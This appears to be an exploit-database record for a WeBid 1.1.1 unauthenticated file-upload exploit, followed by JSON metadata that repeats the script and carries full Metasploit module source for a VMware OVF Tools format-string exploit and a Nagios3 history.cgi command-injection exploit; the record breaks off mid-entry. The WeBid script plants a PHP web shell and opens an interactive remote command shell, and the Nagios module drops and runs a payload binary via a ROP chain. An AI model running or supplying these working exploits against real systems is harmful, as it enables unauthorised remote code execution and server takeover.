ID 1337DAY-ID-23323
Type zdt
Reporter CWH Underground
Modified 2015-02-23T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
Date : 20 February 2015
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.webidsupport.com/
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
Version : 1.1.1
Tested on : Window and Linux
#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################
/ajax.php
/inc/plupload/examples/upload.php
#####################################################
DESCRIPTION
#####################################################
This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+----------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n+----------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /WeBid/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
print "\n\nExploiting...";
sleep(2);
print "Waiting for shell...\n";
sleep(2);
http_send($host, $packet);
$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
while(1)
{
print "\nWebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
# 0day.today [2018-02-10] #
{"published": "2015-02-23T00:00:00", "id": "1337DAY-ID-23323", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:00:54", "bulletin": {"published": "2015-02-23T00:00:00", "id": "1337DAY-ID-23323", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T04:00:54"}}, "hash": "6dd2541cf9372a4a9d511e92f212cbdc47009206584f181e40420eb90d61984d", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T04:00:54", "edition": 1, "title": "WeBid 1.1.1 Unrestricted File Upload Exploit", "href": "http://0day.today/exploit/description/23323", "modified": "2015-02-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/23323", "references": [], "reporter": "CWH Underground", "sourceData": "<?php\r\n \r\n/*\r\n \r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O .. CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n \r\n Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit\r\n Date : 20 February 2015\r\n Exploit Author : CWH Underground\r\n Site : www.2600.in.th\r\n Vendor Homepage : http://www.webidsupport.com/\r\n Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download\r\n Version : 1.1.1\r\n Tested on : Window and Linux\r\n \r\n \r\n#####################################################\r\nVULNERABILITY: Arbitrary File Upload Vulnerability\r\n#####################################################\r\n \r\n/ajax.php\r\n/inc/plupload/examples/upload.php\r\n \r\n#####################################################\r\nDESCRIPTION\r\n#####################################################\r\n \r\nThis exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the\r\nupload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\r\n \r\n#####################################################\r\nEXPLOIT\r\n#####################################################\r\n \r\n*/\r\n \r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n \r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n \r\nprint \"\\n+----------------------------------------+\";\r\nprint \"\\n| WeBid Unrestricted File Upload Exploit |\";\r\nprint \"\\n+----------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /WeBid/\\n\";\r\n die();\r\n}\r\n \r\n$host = $argv[1];\r\n$path = $argv[2];\r\n \r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\\r\\n\";\r\n$payload .= \"shell.php\\r\\n\";\r\n$payload .= \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.php\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n \r\n$packet = \"POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Cookie: PHPSESSID=cwh\".\"\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nprint \"\\n\\nExploiting...\";\r\nsleep(2);\r\nprint \"Waiting for shell...\\n\";\r\nsleep(2);\r\n \r\nhttp_send($host, $packet);\r\n \r\n$packet = \"GET {$path}uploaded/cwh/shell.php HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n print \"\\n ,--^----------,--------,-----,-------^--, \\n\";\r\n print \" | ||||||||| `--------' | O \\n\";\r\n print \" `+---------------------------^----------| \\n\";\r\n print \" `\\_,-------, _________________________| \\n\";\r\n print \" / XXXXXX /`| / \\n\";\r\n print \" / XXXXXX / `\\ / \\n\";\r\n print \" / XXXXXX /\\______( \\n\";\r\n print \" / XXXXXX / \\n\";\r\n print \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\n print \" (________( \\n\";\r\n print \" `------' \\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\nWebid-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n \r\n################################################################################################################\r\n# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\r\n################################################################################################################\r\n?>\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e8e10e8dc7892cd9e20cd3e287a87ad8", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1ed64e57d6f6b350c890095efe94b7cc", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9e864242aef94fd273fa0c68ff07fa6a", "key": "reporter"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "modified"}, {"hash": "0b25d9cd7d7d4c2242183904b14b2529", "key": "href"}, {"hash": "c0b6cdeaaa5f0020227c655f7d44f16b", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "abd44e66626a0511ff4559cb0ba776f0850db8fd355be3c696887e5f551b8c7e", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-10T11:41:56"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23323", "SECURITYVULNS:VULN:10670"]}, {"type": "zdt", "idList": ["1337DAY-ID-8289"]}], "modified": "2018-02-10T11:41:56"}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-02-10T11:41:56", "edition": 2, "title": "WeBid 1.1.1 Unrestricted File Upload Exploit", "href": "https://0day.today/exploit/description/23323", "modified": "2015-02-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 86, "cvelist": [], "sourceHref": "https://0day.today/exploit/23323", "references": [], "reporter": "CWH Underground", "sourceData": "<?php\r\n \r\n/*\r\n \r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O .. CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n \r\n Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit\r\n Date : 20 February 2015\r\n Exploit Author : CWH Underground\r\n Site : www.2600.in.th\r\n Vendor Homepage : http://www.webidsupport.com/\r\n Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download\r\n Version : 1.1.1\r\n Tested on : Window and Linux\r\n \r\n \r\n#####################################################\r\nVULNERABILITY: Arbitrary File Upload Vulnerability\r\n#####################################################\r\n \r\n/ajax.php\r\n/inc/plupload/examples/upload.php\r\n \r\n#####################################################\r\nDESCRIPTION\r\n#####################################################\r\n \r\nThis exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the\r\nupload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\r\n \r\n#####################################################\r\nEXPLOIT\r\n#####################################################\r\n \r\n*/\r\n \r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n \r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n \r\nprint \"\\n+----------------------------------------+\";\r\nprint \"\\n| WeBid Unrestricted File Upload Exploit |\";\r\nprint \"\\n+----------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /WeBid/\\n\";\r\n die();\r\n}\r\n \r\n$host = $argv[1];\r\n$path = $argv[2];\r\n \r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\\r\\n\";\r\n$payload .= \"shell.php\\r\\n\";\r\n$payload .= \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.php\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n \r\n$packet = \"POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Cookie: PHPSESSID=cwh\".\"\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nprint \"\\n\\nExploiting...\";\r\nsleep(2);\r\nprint \"Waiting for shell...\\n\";\r\nsleep(2);\r\n \r\nhttp_send($host, $packet);\r\n \r\n$packet = \"GET {$path}uploaded/cwh/shell.php HTTP/1.1\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n print \"\\n ,--^----------,--------,-----,-------^--, \\n\";\r\n print \" | ||||||||| `--------' | O \\n\";\r\n print \" `+---------------------------^----------| \\n\";\r\n print \" `\\_,-------, _________________________| \\n\";\r\n print \" / XXXXXX /`| / \\n\";\r\n print \" / XXXXXX / `\\ / \\n\";\r\n print \" / XXXXXX /\\______( \\n\";\r\n print \" / XXXXXX / \\n\";\r\n print \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\n print \" (________( \\n\";\r\n print \" `------' \\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\nWebid-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n \r\n################################################################################################################\r\n# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\r\n################################################################################################################\r\n?>\n\n# 0day.today [2018-02-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "d7c716b01e4a30936ae14d7702d65758", "key": "href"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "modified"}, {"hash": "6fadd98b78cee69faa608ac7283c958d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9e864242aef94fd273fa0c68ff07fa6a", "key": "reporter"}, {"hash": "09e768e27ba2bce3f18df949afdfb5e4", "key": "sourceData"}, {"hash": "528bfefe9bd6e837e105252accd5d684", "key": "sourceHref"}, {"hash": "e8e10e8dc7892cd9e20cd3e287a87ad8", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-03T11:28:13", "bulletinFamily": "exploit", "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-04T15:37:42", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/OVFTOOL_FORMAT_STRING", "href": "", "type": "metasploit", "title": "VMWare OVF Tools Format String Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'VMWare OVF Tools Format String Vulnerability',\n 'Description' => %q{\n This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeremy Brown', # Vulnerability discovery\n 'juan vazquez' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-3569' ],\n [ 'OSVDB', '87117' ],\n [ 'BID', '56468' ],\n [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' =>\n (0x00..0x08).to_a.pack(\"C*\") +\n \"\\x0b\\x0c\\x0e\\x0f\" +\n (0x10..0x1f).to_a.pack(\"C*\") +\n (0x80..0xff).to_a.pack(\"C*\") +\n \"\\x22\",\n 'StackAdjustment' => -3500,\n 'PrependEncoder' => \"\\x54\\x59\", # push esp # pop ecx\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'ECX',\n 'BufferOffset' => 6\n }\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # vmware-ovftool-2.1.0-467744-win-i386.msi\n [ 'VMWare OVF Tools 2.1 on Windows XP SP3',\n {\n 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1\n 'AddrPops' => 98,\n 'StackPadding' => 38081,\n 'Alignment' => 4096\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 08 2012',\n 'DefaultTarget' => 0))\n\n end\n\n def ovf\n my_payload = rand_text_alpha(4) # ebp\n my_payload << [target.ret].pack(\"V\") # eip # call esp\n my_payload << payload.encoded\n\n fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)\n fs << rand_text_alpha(target['Alignment']) # Align to 0x11000\n fs << my_payload\n # 65536 => 0x10000\n # 27 => Error message prefix length\n fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))\n fs << \"%08x\" * target['AddrPops'] # Reach saved EBP\n fs << \"%hn\" # Overwrite LSW of saved EBP with 0x1000\n\n ovf_file = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Envelope vmw:buildId=\"build-162856\" xmlns=\"http://schemas.dmtf.org/ovf/envelope/1\"\nxmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\"\nxmlns:ovf=\"http://schemas.dmtf.org/ovf/envelope/1\"\nxmlns:rasd=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData\"\nxmlns:vmw=\"http://www.vmware.com/schema/ovf\"\nxmlns:vssd=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData\"\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n <References>\n <File ovf:href=\"Small VM-disk1.vmdk\" ovf:id=\"file1\" ovf:size=\"68096\" />\n </References>\n <DiskSection>\n <Info>Virtual disk information</Info>\n <Disk ovf:capacity=\"8\" ovf:capacityAllocationUnits=\"#{fs}\" ovf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\" ovf:format=\"http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized\" />\n </DiskSection>\n <VirtualSystem ovf:id=\"Small VM\">\n <Info>A virtual machine</Info>\n </VirtualSystem>\n</Envelope>\n EOF\n ovf_file\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n\n if agent !~ /VMware-client/ or agent !~ /ovfTool/\n print_status(\"User agent #{agent} not recognized, answering Not Found...\")\n send_not_found(cli)\n end\n\n if uri =~ /.mf$/\n # The manifest file isn't required\n print_status(\"Sending Not Found for Manifest file request...\")\n send_not_found(cli)\n end\n\n print_status(\"Sending OVF exploit...\")\n send_response(cli, ovf, {'Content-Type'=>'text/xml'})\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ovftool_format_string.rb"}, {"lastseen": "2019-11-03T11:27:59", "bulletinFamily": "exploit", "description": "This module abuses a command injection vulnerability in the Nagios3 history.cgi script.\n", "modified": "2018-08-20T20:43:07", "published": "2013-01-15T14:32:32", "id": "MSF:EXPLOIT/UNIX/WEBAPP/NAGIOS3_HISTORY_CGI", "href": "", "type": "metasploit", "title": "Nagios3 history.cgi Host Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios3 history.cgi Host Command Execution',\n 'Description' => %q{\n This module abuses a command injection vulnerability in the\n Nagios3 history.cgi script.\n },\n 'Author' => [\n 'Unknown <temp66[at]gmail.com>',\t\t # Original finding\n 'blasty <blasty[at]fail0verflow.com>',\t # First working exploit\n 'Jose Selvi <jselvi[at]pentester.es>',\t # Metasploit module\n 'Daniele Martini <cyrax[at]pkcrew.org>'\t# Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6096' ],\n [ 'OSVDB', '88322' ],\n [ 'BID', '56879' ],\n [ 'EDB', '24084' ]\n ],\n 'Platform' => %w{ linux unix },\n 'Arch' => [ ARCH_X86 ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 200,\t# Due to a system() parameter length limitation\n 'BadChars' => '',\t# It'll be base64 encoded\n },\n 'Targets' =>\n [\n [ 'Automatic Target', { 'auto' => true }],\n # NOTE: All addresses are from the history.cgi binary\n [ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)',\n {\n 'BannerRE' => 'Apache/2.2.15 (CentOS)',\n 'VersionRE' => '3.4.1',\n 'Arch' => ARCH_X86,\n 'Offset' => 0xc43,\n 'RopStack' =>\n [\n 0x0804c260,\t# unescape_cgi_input()\n 0x08048f04,\t# pop, ret\n 0x08079b60,\t# buffer addr\n 0x08048bb0,\t# system()\n 0x08048e70,\t# exit()\n 0x08079b60\t# buffer addr\n ]\n }\n ],\n [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)',\n {\n 'BannerRE' => 'Apache/2.2.9 (Debian)',\n 'VersionRE' => '3.0.6',\n 'Arch' => ARCH_X86,\n 'Offset' => 0xc37,\n 'RopStack' =>\n [\n 0x0804b620,\t# unescape_cgi_input()\n 0x08048fe4,\t# pop, ret\n 0x080727a0,\t# buffer addr\n 0x08048c7c,\t# system()\n 0xdeafbabe,\t# if should be exit() but it's not\n 0x080727a0\t# buffer addr\n ]\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2012'))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"The full URI path to history.cgi\", \"/nagios3/cgi-bin/history.cgi\"]),\n OptString.new('USER', [true, \"The username to authenticate with\", \"nagiosadmin\"]),\n OptString.new('PASS', [true, \"The password to authenticate with\", \"nagiosadmin\"]),\n ])\n end\n\n def detect_version(uri)\n # Send request\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64(\"#{datastore['USER']}:#{datastore['PASS']}\") },\n }, 10)\n\n # Error handling\n if res.nil?\n print_error(\"Unable to get a response from the server\")\n return nil, nil\n end\n if(res.code == 401)\n print_error(\"Please specify correct values for USER and PASS\")\n return nil, nil\n end\n if(res.code == 404)\n print_error(\"Please specify the correct path to history.cgi in the URI parameter\")\n return nil, nil\n end\n\n # Extract banner from response\n banner = res.headers['Server']\n\n # Extract version from body\n version = nil\n version_line = res.body.match(/Nagios® (Core™ )?[0-9.]+ -/)\n if not version_line.nil?\n version = version_line[0].match(/[0-9.]+/)[0]\n end\n\n # Check in an alert exists\n alert = res.body.match(/ALERT/)\n\n return version, banner, alert\n end\n\n def select_target(version, banner)\n\n # No banner and version, no target\n if banner.nil? or version.nil?\n return nil\n end\n\n # Get version information\n print_status(\"Web Server banner: #{banner}\")\n print_status(\"Nagios version detected: #{version}\")\n\n # Try regex for each target\n self.targets.each do |t|\n if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target\n next\n end\n regexp1 = Regexp.escape(t['BannerRE'])\n regexp2 = Regexp.escape(t['VersionRE'])\n if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then\n return t\n end\n end\n # If not detected, return nil\n return nil\n end\n\n def check\n print_status(\"Checking banner and version...\")\n # Detect version\n banner, version, alert = detect_version(target_uri.path)\n # Select target\n mytarget = select_target(banner, version)\n\n if mytarget.nil?\n vprint_error(\"No matching target\")\n return CheckCode::Unknown\n end\n\n if alert.nil?\n vprint_error(\"At least one ALERT is needed in order to exploit\")\n return CheckCode::Detected\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n # Automatic Targeting\n mytarget = nil\n banner, version, alert = detect_version(target_uri.path)\n if (target['auto'])\n print_status(\"Automatically detecting the target...\")\n mytarget = select_target(banner, version)\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n else\n mytarget = target\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n if alert.nil?\n print_error(\"At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...\")\n end\n print_status(\"Sending request to http://#{rhost}:#{rport}#{target_uri.path}\")\n\n # Generate a payload ELF to execute\n elfbin = generate_payload_exe\n elfb64 = Rex::Text.encode_base64(elfbin)\n\n # Generate random filename\n tempfile = '/tmp/' + rand_text_alphanumeric(10)\n\n # Generate command-line execution\n if mytarget.name =~ /CentOS/\n cmd = \"echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};\"\n else\n cmd = \"echo #{elfb64}|base64 -d|tee #{tempfile} |chmod +x #{tempfile};#{tempfile};rm -f #{tempfile}\"\n end\n host_value = cmd.gsub!(' ', '${IFS}')\n\n # Generate 'host' parameter value\n padding_size = mytarget['Offset'] - host_value.length\n host_value << rand_text_alphanumeric( padding_size )\n\n # Generate ROP\n host_value << mytarget['RopStack'].pack('V*')\n\n # Send exploit\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64(\"#{datastore['USER']}:#{datastore['PASS']}\") },\n 'vars_get' =>\n {\n 'host' => host_value\n }\n })\n\n if not res\n if session_created?\n print_status(\"Session created, enjoy!\")\n else\n print_error(\"No response from the server\")\n end\n return\n end\n\n if res.code == 401\n fail_with(Failure::NoAccess, \"Please specify correct values for USER and PASS\")\n end\n\n if res.code == 404\n fail_with(Failure::NotFound, \"Please specify the correct path to history.cgi in the TARGETURI parameter\")\n end\n\n print_status(\"Unknown response #{res.code}\")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/nagios3_history_cgi.rb"}, {"lastseen": "2019-12-03T05:43:33", "bulletinFamily": "exploit", "description": "This module abuses the \"RunScript\" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX). The exploit drops the payload on the server and must be removed manually.\n", "modified": "2017-09-08T01:18:50", "published": "2012-12-04T21:04:21", "id": "MSF:EXPLOIT/MULTI/MISC/INDESIGN_SERVER_SOAP", "href": "", "type": 